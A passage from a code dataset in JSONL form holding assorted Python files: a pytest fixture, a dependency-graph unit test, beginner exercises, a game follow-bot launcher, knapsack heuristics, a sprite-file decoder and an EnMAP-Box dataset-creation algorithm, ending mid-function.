backend は asyncio のみ対応。trioは対応しない。\"\"\"\n return \"asyncio\"\n\n\ndef get_file(src: str, mode: str = \"r\"):\n target = os.path.join(os.path.dirname(__file__), \"samples\", src)\n return open(target, mode)\n\n\n# @pytest.fixture(scope=\"module\", autouse=True)\n# @pytest.fixture(scope=\"function\", autouse=True)\nasync def clear_files():\n test_dir = os.path.join(os.path.dirname(__file__), \"dir_asgi\")\n\n for item in os.listdir(test_dir):\n target = os.path.join(test_dir, item)\n if os.path.isfile(target):\n print(f\"file {target}\")\n await asyncer.asyncify(os.unlink)(target)\n elif os.path.isdir(target):\n print(f\"dir {target}\")\n await asyncer.asyncify(shutil.rmtree)(target)\n\n while True:\n if await asyncer.asyncify(os.path.exists)(target):\n ...\n else:\n break\n","repo_name":"sasano8/object_storage_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12039053334","text":"import pytest\n\n\ndef test_dependency_graph():\n from speechbrain.utils.depgraph import (\n DependencyGraph,\n CircularDependencyError,\n )\n\n dg = DependencyGraph()\n # a->b->c\n dg.add_edge(\"b\", \"c\")\n dg.add_edge(\"a\", \"b\")\n assert dg.is_valid()\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"]\n dg = DependencyGraph()\n # a->b->c, a->c\n dg.add_edge(\"b\", \"c\")\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"a\", \"c\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"]\n dg = DependencyGraph()\n # a->b, a->c\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"a\", \"c\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"c\", \"b\", \"a\"] or eval_order == [\"b\", \"c\", \"a\"]\n dg = DependencyGraph()\n # a->b, c->d\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"c\", \"d\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n valid_orders = [\n [\"d\", \"c\", \"b\", \"a\"],\n [\"d\", \"b\", \"c\", \"a\"],\n [\"d\", \"b\", \"a\", \"c\"],\n [\"b\", \"a\", \"d\", \"c\"],\n [\"b\", \"d\", \"a\", \"c\"],\n [\"b\", \"d\", \"c\", \"a\"],\n ]\n assert eval_order in valid_orders\n dg = DependencyGraph()\n # a->b\n dg.add_node(\"a\")\n dg.add_node(\"b\")\n dg.add_edge(\"a\", \"b\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"b\", \"a\"]\n dg = DependencyGraph()\n # a->b->a Impossible!\n dg.add_edge(\"a\", \"b\")\n dg.add_edge(\"b\", \"a\")\n assert not dg.is_valid()\n with pytest.raises(CircularDependencyError):\n list(dg.get_evaluation_order())\n dg = DependencyGraph()\n # a->b with data\n # should use uuids\n a_key = dg.add_node(data=\"a\")\n assert a_key != \"a\"\n b_key = dg.add_node(data=\"b\")\n dg.add_edge(a_key, b_key)\n eval_order_data = [node.data for node in dg.get_evaluation_order()]\n assert eval_order_data == [\"b\", \"a\"]\n # Adding same key in edge (implicitly) and then explicitly is ok:\n dg = DependencyGraph()\n dg.add_edge(\"a\", \"b\")\n dg.add_node(\"a\")\n eval_order = [node.key for node in dg.get_evaluation_order()]\n assert eval_order == [\"b\", \"a\"]\n # But adding same key twice explicitly will not work:\n with pytest.raises(ValueError):\n dg.add_node(\"a\")\n","repo_name":"speechbrain/speechbrain","sub_path":"tests/unittests/test_dependency_graph.py","file_name":"test_dependency_graph.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":6855,"dataset":"github-code","pt":"52"} +{"seq_id":"22432981912","text":"# Exercício Python 69: Crie um programa que leia a idade e o sexo de várias pessoas. A cada pessoa cadastrada, o\r\n# programa deverá perguntar se o usuário quer ou não continuar. No final, mostre:\r\n#\r\n# A) quantas pessoas tem mais de 18 anos.\r\n# B) quantos homens foram cadastrados.\r\n# C) quantas mulheres tem menos de 20 anos.\r\nfrom time import sleep\r\n\r\nage = age_18counter = man_counter = w_under20 = persons = 0\r\nsex = ' '\r\nwhile True:\r\n age = int(input('Enter the age: '))\r\n sex = str(input('Enter the gender of this person [M/F]: ')).strip()[0]\r\n while sex not in 'MmFf':\r\n sex = str(input('This sex does not exist!! Type again [M/F]: ')).strip()[0]\r\n persons += 1\r\n if age >= 18:\r\n age_18counter += 1\r\n if sex in 'Mm':\r\n man_counter += 1\r\n else:\r\n if age < 20:\r\n w_under20 += 1\r\n asw = str(input('Do you want to continue? [Y/N]: '))\r\n while asw not in 'YyNn':\r\n asw = str(input('This option does not exist!!\\nDo you want to continue? [Y/N]: ')).strip()[0]\r\n if asw in 'Yy':\r\n print('-=-' * 20)\r\n print('Creating new form...')\r\n print('-=-' * 20)\r\n sleep(4)\r\n elif asw in 'Nn':\r\n break\r\nprint('~' * 70)\r\nif persons > 1: # if there are 2 or more persons.\r\n print(f'From {persons} people registered.', end=' ')\r\n if age_18counter > 1: # Persons above 18 years.\r\n print(f'There are {age_18counter} persons above 18-years-old.')\r\n elif age_18counter == 1:\r\n print(f'The is one person above 18-years-old.')\r\n elif age_18counter < 1:\r\n print('There is not a person above 18-years-old.')\r\n if man_counter > 1: # if there are 2 or more men registered.\r\n print(f'\\nThere are {man_counter} men registered', end=' ')\r\n elif man_counter < 1:\r\n print(f'\\nThere is not man registered', end=' ')\r\n elif man_counter == 1:\r\n print(f'\\nThere is one man registered', end=' ')\r\n if w_under20 > 1: # if there are 2 or more women above 20-years-old.\r\n print(f'and there are {w_under20} women under 20-years-old.')\r\n elif w_under20 < 1:\r\n print(f'and there is not woman under 20-years-old')\r\n elif w_under20 == 1:\r\n print(f'and there is one woman under 20-years-old.')\r\nelif persons == 1: # if there is one person.\r\n print(f'From a {persons} registered person.', end=' ')\r\n if age_18counter > 1: # Persons above 18 years\r\n print(f'There are {age_18counter} persons above 18-years-old.')\r\n elif age_18counter == 1:\r\n print(f'The is one person above 18-years-old.')\r\n elif age_18counter < 1:\r\n print('There is not a person above 18-years-old.')\r\n if man_counter > 1: # if there are 2 or more men registered.\r\n print(f'\\nThere are {man_counter} men registered', end=' ')\r\n elif man_counter < 1:\r\n print(f'\\nThere is not man registered', end=' ')\r\n elif man_counter == 1:\r\n print(f'\\nThere is one man registered', end=' ')\r\n if w_under20 > 1: # if there are 2 or more women above 20-years-old.\r\n print(f'and there are {w_under20} women under 20-years-old.')\r\n elif w_under20 < 1:\r\n print(f'and there is not woman under 20-years-old')\r\n elif w_under20 == 1:\r\n print(f'and there is one woman under 20-years-old.')\r\nprint('~'*70)\r\n","repo_name":"NLeopy/Curso-em-video-python-world2","sub_path":"ex069-100%.py","file_name":"ex069-100%.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11421604009","text":"import os\nimport sys\nsys.path.append(os.getcwd())\nimport threading\nimport PoeNeuronData\n#import PoeNeuronTextThread\n#import PoeNeuronFollowPlayerThread\nimport PoeNeuronMovementThread\nimport PoeNeuronObjectDetectionThread\nimport PoeNeuronFogThread\nimport tkinter\nimport pynput\n\n\ndef hook_keyboard(data):\n from pynput.keyboard import Key\n from pynput.keyboard import Listener\n\n\n def on_press(key):\n pass\n\n def on_release(key):\n try:\n if key.char == 'a' or key == Key.esc:\n data._escape = True\n except:\n return\n\n # Collect events until released\n with Listener(\n on_press=on_press,\n on_release=on_release) as listener:\n listener.join()\n \nif __name__ == \"__main__\":\n data = PoeNeuronData.PoeNeuronData()\n \"\"\"\n text_thread = threading.Thread(target=PoeNeuronTextThread.PoeNeuronTextThread, args=(data,))\n text_thread.setDaemon(True)\n text_thread.start()\n \"\"\"\n \n \n \"\"\"\n follow_player_thread = threading.Thread(target=PoeNeuronFollowPlayerThread.PoeNeuronFollowPlayerThread, args=(data,))\n follow_player_thread.setDaemon(True)\n follow_player_thread.start()\n \"\"\"\n \n movement_thread = threading.Thread(target=PoeNeuronMovementThread.PoeNeuronMovementThread, args=(data,))\n movement_thread.setDaemon(True)\n movement_thread.start()\n \n detection_thread = threading.Thread(target=PoeNeuronObjectDetectionThread.PoeNeuronObjectDetectionThread, args=(data,))\n detection_thread.setDaemon(True)\n detection_thread.start()\n \n fog_thread = threading.Thread(target=PoeNeuronFogThread.PoeNeuronFogThread, args=(data,))\n fog_thread.setDaemon(True)\n fog_thread.start()\n \n keyboard_thread = threading.Thread(target=hook_keyboard, args=(data,))\n keyboard_thread.setDaemon(True)\n keyboard_thread.start()\n \n \n \n \n root = tkinter.Tk()\n text_command = tkinter.StringVar()\n player_position_str = tkinter.StringVar()\n\n def update_display():\n text_command.set(data._text_command)\n \n if data._move_location_command:\n player_position_str.set(\"{} x {}\".format(data._move_location_command[0], data._move_location_command[1]))\n else:\n player_position_str.set(None)\n \n root.after(1000,update_display)\n root.update_idletasks()\n \n label1 = tkinter.Label(root, textvariable=text_command)\n label1.pack()\n \n label2 = tkinter.Label(root, textvariable=player_position_str)\n label2.pack()\n \n root.after(1000,update_display)\n \n root.mainloop()\n \n \n ","repo_name":"StrugglezX/PoeFollowBot","sub_path":"PoeNeuron.py","file_name":"PoeNeuron.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"11490330909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 11 14:38:56 2022\n@author: Kamaldeep Kaur\n@Id : 35984681\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# Function to read and parse Input file\ndef ReadInput(filename): \n dataFile = open(filename, \"r\")\n data = []\n headers = []\n rhss = []\n while True:\n rawdata = [] \n fline = dataFile.readline()\n fline = fline.strip()\n if len(fline) == 0: \n break\n vars = fline.split(' ')\n header = [float(var) for var in vars]\n headers.append(header)\n while len(rawdata)!= (header[0])*(header[1]+1): # Read all objective and constraint elements as speciifed in the first row of data set \n theline = dataFile.readline()\n theline = theline.strip()\n if len(theline) == 0:\n break \n readData = theline.split(\" \")\n rawdata+= readData\n rawdata = [float(item) for item in rawdata]\n datum = np.array(rawdata)\n datum = np.reshape(datum,(int(header[1]+1),int(header[0]))) \n lastline = dataFile.readline()\n lastline = lastline.strip()\n if len(lastline) == 0:\n break\n vars = lastline.split(' ')\n rhs = [float(var) for var in vars] # Extract Rhs values for each dataset and append in rhss\n rhss.append(rhs)\n #Convert array to dataframe and transpose data to have Objective and Constraints as columns\n df = pd.DataFrame(datum)\n df = df.astype(float)\n df = df.transpose()\n # create column names in dataframe\n collist = []\n collen = len(df.columns)\n for i in range(collen):\n if i == 0:\n collist.append(str(\"Obj\")) \n else:\n collist.append(str(\"Con\"+str(i)))\n\n df.columns = collist\n data.append(df) #Append each dataset extracted from the file to list called \"data\" \n dataFile.close()\n return data,headers,rhss\n\n\n\n# Function to generate Constructive initial solution \ndef InitialSolution(df,collen,rhs,elmts):\n x = np.random.randint(1, collen) # Choose constraint from random generator to asses profit to Weight ration for knapsack \n #print(\"Intial Solution column\",x)\n df[\"P/W\"] = df[\"Obj\"]/(df[str(\"Con\"+str(x))].replace(0,1))\n df = df.sort_values(by=\"P/W\", ascending=False) # Sort items as per Profit to Weight ratio in desc order\n sol = pd.DataFrame(columns = df.columns)\n conc , binsol = [0]*(collen-1) , [0]*elmts\n for i in range(len(df)): # Validate rhs values constrains for each item entering the sack\n for j in range(collen-1):\n conc[j]= conc[j] + df[str(\"Con\"+str(j+1))].values[i]\n if (any(conc[i] > rhs[i] for i in range(len(conc))) == True) :\n break \n sol = sol.append(df[i:i+1])\n indexes = sol.index.values\n for i in indexes :\n binsol[i] = 1 # Initial solution in binary form\n return sol , binsol\n\n# Function to calculate total weight for each constraint to check solution feasability\ndef TotProConstraints(df,binsol,collen):\n df['binsol'] = binsol\n conc = [0]*(collen-1)\n pro = 0\n pro = sum(df[\"Obj\"]*df[\"binsol\"])\n for j in range(collen-1):\n conc[j]= conc[j] + sum(df[str(\"Con\"+str(j+1))]*df[\"binsol\"]) \n return pro,conc\n\n# Function to find neighbouring solution for Hill Climbing\ndef Negihboursol(binsol):\n n = len(binsol)\n result = np.copy(binsol)\n rnd = np.random.RandomState() \n i = rnd.randint(n) # pick an item at random and swap the values 0 to 1 / 1 to 0 \n if result[i] == 0:\n result[i] = 1\n elif result[i] == 1:\n result[i] = 0\n return result\n\n# Hill Climbing method \ndef HillClimbing(df,rhs,collen,binsol,numiter = 1000):\n # First evaluate the initial solution (its total proffit)\n sol = binsol\n df = df.set_index([df.index.values + 1])\n curr_pro = sum(df[\"Obj\"]*sol)\n # Now carry out the main loop of the algorithm\n for i in range(numiter):\n temp = Negihboursol(sol) # Find Neighbouring solution\n (neg_pro, negconlist) = TotProConstraints(df,temp,collen)\n if not(any(negconlist[i] > rhs[i] for i in range(len(negconlist))) == True) : # Check feasability of the neighbouring solution\n if (neg_pro > curr_pro): # better solution, so accept adjacent\n sol = temp.copy(); \n curr_pro = neg_pro\n \n df[\"binsol\"] = sol\n finsol = df[df[\"binsol\"]==1] # Final solution of hill climbing\n return finsol\n\n\n# Simulated Annealing method \ndef SimAnnealing(binsol,df,rhs,collen, starttemp= 100000,stoptemp = 0.001, alpha = 0.99):\n # solve using simulated annealing\n df = df.set_index([df.index.values + 1]) \n rnd = np.random.RandomState(5)\n currtemperature = starttemp \n curr_binsol = binsol\n (curr_pro, conlist) = TotProConstraints(df,curr_binsol,collen)\n while currtemperature > stoptemp: \n neg_binsol = Negihboursol(curr_binsol)\n (neg_pro, negconlist) = TotProConstraints(df,neg_binsol,collen)\n if not(any(negconlist[i] > rhs[i] for i in range(len(negconlist))) == True) : # Validate feasability of the neighbouring solution \n if (neg_pro >= curr_pro): # better solution so accept adjacent\n curr_binsol = neg_binsol; curr_pro = neg_pro\n else: # neighbouring solution is worst\n accept_p = np.exp( (neg_pro - curr_pro ) / currtemperature ) # if calculate accept_p value for difference in solution at curr temperation in the iteration\n p = rnd.random()\n if p < accept_p: # if randonm p is less then accept_p worse solution is picked anyway\n curr_binsol = neg_binsol; curr_pro = neg_pro\n currtemperature = currtemperature * alpha\n df[\"binsol\"] = curr_binsol\n df = df[df[\"binsol\"]==1] # Final solution of simulated annearling\n return df \n \n##########################################################################################################\n################################ Read and run the test files #############################################\n##########################################################################################################\n\nfilename = input(\"Enter File Name :\")\ndata, header,rhss = ReadInput(filename = filename)\nheumethod = int(input(\"Enter 1 for Hill Climbing improvement or 2 for Simulated Annealing :\"))\nif heumethod == 1 :\n numiter = int(input(\"Enter number of iterations :\"))\n HillClimbSol = []\n for k in range(len(data)):\n df = data[k]\n elements = len(df)\n rhs = rhss[k]\n collen = len(df.columns)\n for j in range(10):\n finalpro = 0\n for i in range(10):\n intsol, binsol = InitialSolution(df,collen,rhs,elements)\n intsol = intsol.set_index(intsol.index.values+1)\n print(\"Intial Solution based on constructive Heuristics with Profit =\" , \n sum(intsol[\"Obj\"]),\" is \\n\",intsol[\"Obj\"]) \n sol = HillClimbing(df, rhs,collen,binsol,numiter) \n if sum(sol[\"Obj\"]) > finalpro:\n finalpro = sum(sol[\"Obj\"]) \n finalsol = sol\n \n HillClimbSol.append([k,j,list(finalsol[\"binsol\"].index.values),sum(finalsol[\"Obj\"])])\n HillClimbSol = pd.DataFrame(HillClimbSol)\n HillClimbSol.columns = [\"TestInstance\",\"Iteration\",\"Items\",\"Solution\"]\n HillClimbAllSol = HillClimbSol.groupby('TestInstance').agg({'Solution': ['mean', 'min', 'max']})\n HillClimbBestSol= HillClimbSol.loc[HillClimbSol.groupby([\"TestInstance\"])[\"Solution\"].idxmax()]\n HillClimbAllSol.to_csv('HillClimb_Allresults.csv',float_format='%.2f')\n HillClimbBestSol.to_csv('HillClimb_BestSol.csv',float_format='%.2f',header=[\"Test Instance\",\"Iteration\",\"Items\",\"Solution\"])\n print(\"Maximum, Minimum, Avergae and Best solutions are saved in files HillClimb_Allresults.csv and HillClimb_BestSol.csv\")\n print(\"Best Solution Obtained with following profit and items:\",\"\\n\",HillClimbBestSol[[\"TestInstance\",\"Solution\",\"Items\"]]) \nelse :\n if heumethod == 2: \n stemp = int(input(\"Enter start temperature:\")) #10000\n sptemp = float(input(\"Enter the end temperature :\")) #1000\n alpha = float(input(\"Enter alpha:\")) #0.98\n SimAneSol = []\n for k in range(len(data)):\n df = data[k]\n elements = len(df)\n rhs = rhss[k]\n collen = len(df.columns)\n for j in range(10):\n intsol, binsol = InitialSolution(df,collen,rhs,elements)\n intsol = intsol.set_index(intsol.index.values+1)\n print(\"Intial Solution based on constructive Heuristics with Profit =\" , \n sum(intsol[\"Obj\"]),\" is \\n\",intsol[\"Obj\"]) \n finalsol = SimAnnealing(binsol, df, rhs, collen, stemp, sptemp, alpha)\n SimAneSol.append([k,j,list(finalsol[\"binsol\"].index.values),sum(finalsol[\"Obj\"])])\n SimAneSol = pd.DataFrame(SimAneSol)\n SimAneSol.columns = [\"TestInstance\",\"Iteration\",\"Items\",\"Solution\"]\n SimAneAllSol = SimAneSol.groupby('TestInstance').agg({'Solution': ['mean', 'min', 'max']})\n SimAneBestSol= SimAneSol.loc[SimAneSol.groupby([\"TestInstance\"])[\"Solution\"].idxmax()]\n SimAneAllSol.to_csv('SimAnne_Allresults.csv',float_format='%.2f')\n SimAneBestSol.to_csv('SimAnne_BestSol.csv',float_format='%.2f',header=[\"Test Instance\",\"Iteration\",\"Items\",\"Solution\"])\n print(\"Maximum, Minimum, Avergae and Best solutions are saved in files SimAnne_Allresults.csv and SimAnne_BestSol.csv\")\n print(\"Best Solution Obtained with following profit and items:\",\"\\n\",SimAneBestSol[[\"TestInstance\",\"Solution\",\"Items\"]]) \n\n else :\n print(\"Option entered is invalid\")\n","repo_name":"kdeepkaur/Data-Science-Code","sub_path":"Multi Knapsack Heuristics.py","file_name":"Multi Knapsack Heuristics.py","file_ext":"py","file_size_in_byte":9706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22003639167","text":"# def not_string(str, n):\n# first_Part = str[:n]\n# last_Part = str[n+1:]\n# return first_Part + last_Part\n \n# print(not_string('jahangir', 2))\n\n\n# def change_sring(str1):\n# one = str1[-1:]\n# toq = str1[1:-1]\n# three = str1[:1]\n\n# return one + toq + three\n# # return str1[-1:] + str1[1:-1] + str1[:1]\n\t \n# print(change_sring('abcd'))\n# print(change_sring('12345'))\n\n# def fornt3(str):\n# fornt_end = 3\n# if len(str) <= 3:\n# jahangri = \"jahangri\"\n# fornt = str[:fornt_end]\n\n# return fornt + fornt + fornt\n\n# print(fornt3(\"valll\"))\n\n# def sting_times(str, n):\n# result = \"\"\n# for j in range(n):\n# result += str\n\n# return result\n\n# print(sting_times(\"jahangri\", 3))\n\n\n# def front_times(str, n):\n# result = \"\"\n# font_size = 3\n \n# if len(str) <= font_size:\n# font_size = len(str)\n# front = str[:font_size]\n\n# for j in range(n):\n# result = result + front\n# return result\n# print(front_times(\"jahangri\", 5))\n\n# def string_bit(str):\n# result = \"\"\n# for i in range(len(str)):\n# if i % 2 == 0:\n# result = result + str[i]\n# return result\n\n# print(string_bit(\"jahangrialam\"))\n\n\ndef string_splote(str):\n result = \"\"\n\n for i in range(len(str)):\n result = result + str[:i+1]\n return result\nprint(string_splote(\"jaha\"))","repo_name":"jahangir83/Chat_APP","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31197625990","text":"from pathlib import Path\nimport argparse\nimport sys\nimport struct\nimport json\n\ndef error(message):\n print(\"ERROR:\", message, file=sys.stderr)\n\ndef read_uint(f, num_bytes = 4):\n if num_bytes == 4:\n return struct.unpack('= 128:\n return i - 256\n return i\n\ndef read_bit(data, start, start_bit):\n if data[start] & start_bit:\n v = 1\n else:\n v = 0\n\n start_bit //= 2\n if start_bit == 0:\n start_bit = 128\n start += 1\n return (start, start_bit, v)\n\ndef decode(infile, outfile, level_flag, index_zero_is_level_order_data):\n\n with open(infile, 'rb') as fin:\n data = fin.read()\n\n file_size = len(data)\n file_offset = 0\n sprite_index_offset = 0\n if level_flag:\n file_offset = data[0] + 256*data[1]\n if file_offset >= file_size:\n return\n sprite_index_offset = 200\n\n sprites = []\n num_sprites = (data[file_offset] + 256*data[file_offset + 1]) // 2\n for i in range(num_sprites):\n offset = file_offset + data[file_offset + i*2] + 256*data[file_offset + 1 + i*2]\n sprites.append(offset)\n\n sprites.append(file_size)\n\n spr_data = {}\n sprite_array = []\n for i in range(num_sprites):\n start = sprites[i]\n if i < (num_sprites-1):\n end = sprites[i+1]\n else:\n end = file_size\n\n if (i==0) and index_zero_is_level_order_data:\n spr_data[\"level order data\"] = {\n \"developer_flags\": hex(data[start]),\n \"first level\": chr(data[start+1]),\n \"level order\": \"\".join([chr(data[x]) for x in range(start+2, start+18)])\n }\n else:\n sprite = { \"sprite number\": hex(sprite_index_offset + i) }\n if (start != end):\n width = int(data[start+2])\n height = 1+int(data[start+3])\n sprite[\"offset x\"] = sbyte(data[start])\n sprite[\"offset y\"] = sbyte(data[start+1])\n sprite[\"sprite width\"] = width\n sprite[\"sprite height\"] = height-1\n\n start += 4\n start_bit = 128\n lines = [\"\"]*height\n for x in range(width):\n for y in range(height):\n start, start_bit, sprite_bit = read_bit(data, start, start_bit)\n start, start_bit, mask_bit = read_bit(data, start, start_bit)\n\n if not sprite_bit:\n if mask_bit:\n lines[y] += '.'\n else:\n lines[y] += '#'\n else:\n lines[y] += ' '\n if mask_bit:\n for y2 in range(y+1,height):\n lines[y2] += ' '\n break\n\n lines = list(reversed(lines))\n lines = lines[1:] # Remove first line\n\n # move to start of next byte\n if start_bit != 128:\n start += 1\n\n # Check if there are reserved bytes, rather than a standard given set of pixel lines with a width, height\n length_of_reserved_bytes = (sprites[i+1] - start)\n if length_of_reserved_bytes > 0:\n if len(lines) == 0:\n # set zeros when we have reserved space\n lines = '####' * length_of_reserved_bytes\n\n sprite[\"pixels\"] = lines\n\n sprite_array.append(sprite)\n spr_data[\"sprites\"] = sprite_array\n\n with open(outfile, 'w') as fout:\n print(json.dumps(spr_data, indent=4), file=fout)\n\n\nclass MyParser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n def print_help(self, venue=sys.stdout):\n print(\"\"\"usage: decoder.py \n\nConverts binary sprite file from Imogen to text.\n\noptions:\n -h --help show this help message and exit\n -i --input input file (binary sprite file)\n -o --output output file (txt file)\n -z --zero index zero is level order data\n -l --level input is a level file\n\"\"\", file=venue)\n\nif __name__ == '__main__':\n parser = MyParser(\n prog=\"decoder\",\n description=\"Converts binary sprite file from Imogen to text\",\n epilog=\"TobyLobster, 2023\")\n\n parser.add_argument('-i', '--input', help=\"input binary filepath\")\n parser.add_argument('-o', '--output', help=\"output text filepath\")\n parser.add_argument('-z', '--zero', help=\"index zero is level order data\", action=argparse.BooleanOptionalAction, default=False)\n parser.add_argument('-l', '--level', help=\"input is a level file\", action=argparse.BooleanOptionalAction, default=False)\n\n if len(sys.argv)==1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n args = parser.parse_args()\n\n if (args.input != None) and (args.output != None):\n if args.input == args.output:\n error(\"Input and output are the same\")\n exit(-2)\n decode(args.input, args.output, args.level, args.zero)\n exit(0)\n else:\n error(\"Need input and output parameters\")\n\n exit(-1)\n","repo_name":"ZornsLemma/Imogen","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37880331116","text":"import inspect\r\nfrom typing import Dict, Any, List, Tuple\r\n\r\nimport numpy as np\r\n\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.typing import RegressorDump\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback)\r\nfrom enmapbox.typeguard import typechecked\r\n\r\n\r\n@typechecked\r\nclass PrepareRegressionDatasetFromCodeAlgorithm(EnMAPProcessingAlgorithm):\r\n P_CODE, _CODE = 'code', 'Code'\r\n P_OUTPUT_DATASET, _OUTPUT_DATASET = 'outputRegressionDataset', 'Output dataset'\r\n\r\n @classmethod\r\n def displayName(cls) -> str:\r\n return 'Create regression dataset (from Python code)'\r\n\r\n def shortDescription(self) -> str:\r\n return 'Create a regression dataset from Python code and store the result as a pickle file.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._CODE, 'Python code specifying the regression dataset.'),\r\n (self._OUTPUT_DATASET, self.PickleFileDestination)\r\n ]\r\n\r\n def code(cls):\r\n from enmapboxprocessing.typing import Number, List, Target, RegressorDump\r\n\r\n # specify targets and feature names\r\n targets: List[Target] = [\r\n Target(name='variable 1', color='#ff0000'),\r\n Target(name='variable 2', color='#00ff00')\r\n ]\r\n features: List[str] = ['Feature 1', 'Feature 2', 'Feature 3']\r\n\r\n # specify features X as 2d-array with shape (samples, features)\r\n X: List[List[Number]] = [\r\n [1, 2, 3],\r\n [4, 5, 6]\r\n ]\r\n # specify targets y as 2d-array with shape (samples, targets)\r\n y: List[List[float]] = [\r\n [1.1, 1.2], [2.1, 2.2]\r\n ]\r\n\r\n return RegressorDump(targets, features, X, y)\r\n\r\n def defaultCodeAsString(self):\r\n try:\r\n lines = [line[8:] for line in inspect.getsource(self.code).split('\\n')][1:-2]\r\n except OSError:\r\n lines = ['']\r\n lines = '\\n'.join(lines)\r\n return lines\r\n\r\n def regressorDump(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext\r\n ) -> RegressorDump:\r\n namespace = dict()\r\n code = self.parameterAsString(parameters, self.P_CODE, context)\r\n exec(code, namespace)\r\n targets, features, X, y = [namespace[key] for key in ['targets', 'features', 'X', 'y']]\r\n X = np.array(X)\r\n y = np.array(y)\r\n regressorDump = RegressorDump(targets, features, X, y)\r\n return regressorDump\r\n\r\n def group(self):\r\n return Group.DatasetCreation.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterCode(self.P_CODE, self._CODE, self.defaultCodeAsString())\r\n self.addParameterFileDestination(self.P_OUTPUT_DATASET, self._OUTPUT_DATASET, self.PickleFileFilter)\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n filename = self.parameterAsFileOutput(parameters, self.P_OUTPUT_DATASET, context)\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n regressorDump = self.regressorDump(parameters, context)\r\n Utils.pickleDump(regressorDump.__dict__, filename)\r\n\r\n result = {self.P_OUTPUT_DATASET: filename}\r\n self.toc(feedback, result)\r\n return result\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/prepareregressiondatasetfromcodealgorithm.py","file_name":"prepareregressiondatasetfromcodealgorithm.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"39473050529","text":"'''\nSession 4 Prompt: Write a Python program that declares a class\ndescribing your favorite animal. Have the data members of the \nclass represent the following physical parameters of the \nanimal: length of the arms (float), length of the legs (float), \nnumber of eyes (int), does it have a tail? (bool), is it furry? \n(bool). Write an initialization function that sets the values \nof the data members when an instance of the class is created. \nWrite a member function of the class to print out and describe \nthe data members representing the physical characteristics of \nthe animal.\n\n'''\n\nimport sys\n\nclass Panda: #declaring class\n\t#print out description on animal\n\tdef print(self):\n\t\tprint(\"\\nMy favorite animal is a Panda\")\n\t\tprint(f\"It's arms are about {self.num_arms} inches long\")\n\t\tprint(f\"It's legs are about {self.num_legs} inches long\")\n\t\tprint(f\"It has {self.num_eyes} eyes\")\n\t\tif(self.has_tail == True):\n\t\t\tprint(f\"It does have a tail\")\n\t\telse:\n\t\t\tprint(\"It does not have a tail\")\n\n\t\tif(self.is_furry == True):\n\t\t\tprint(f\"It is furry\")\n\t\telse:\n\t\t\tprint(\"It is not furry\")\n\n\t\tprint(\"\\n\")\n\n\t#init functions to set values of data members\n\tdef __init__(self, arms=1.0, legs=1.0, eyes=2, tail=True, furry=True):\n\t\tself.num_arms = arms\n\t\tself.num_legs = legs\n\t\tself.num_eyes = eyes\n\t\tself.has_tail = tail\n\t\tself.is_furry = furry\n\ndef main():\n\n\t#set data members for animal attributes\n\t#with default data\n\tarms = 26.5\n\tlegs = 25.0\n\teyes = 2\n\ttail = True\n\tfurry = True\n\t#set values of data members\n\tanimal = Panda(arms=arms,legs=legs,eyes=eyes,tail=tail,furry=furry)\n\t#print out description\n\tanimal.print()\n\nif __name__==\"__main__\":\n\tmain()\n\n\n","repo_name":"Herrerasaurus/astr-19","sub_path":"Prompt4.py","file_name":"Prompt4.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32479663941","text":"def produitMatriciel(matrice1,matrice2):\n produit_matriciel= []\n for i in range (len (matrice1)):\n ligne = []\n for j in range (len(matrice2[0])):\n for k in range(len(matrice1[0])):\n element = matrice1[i][j]*matrice2[i][j]\n element = 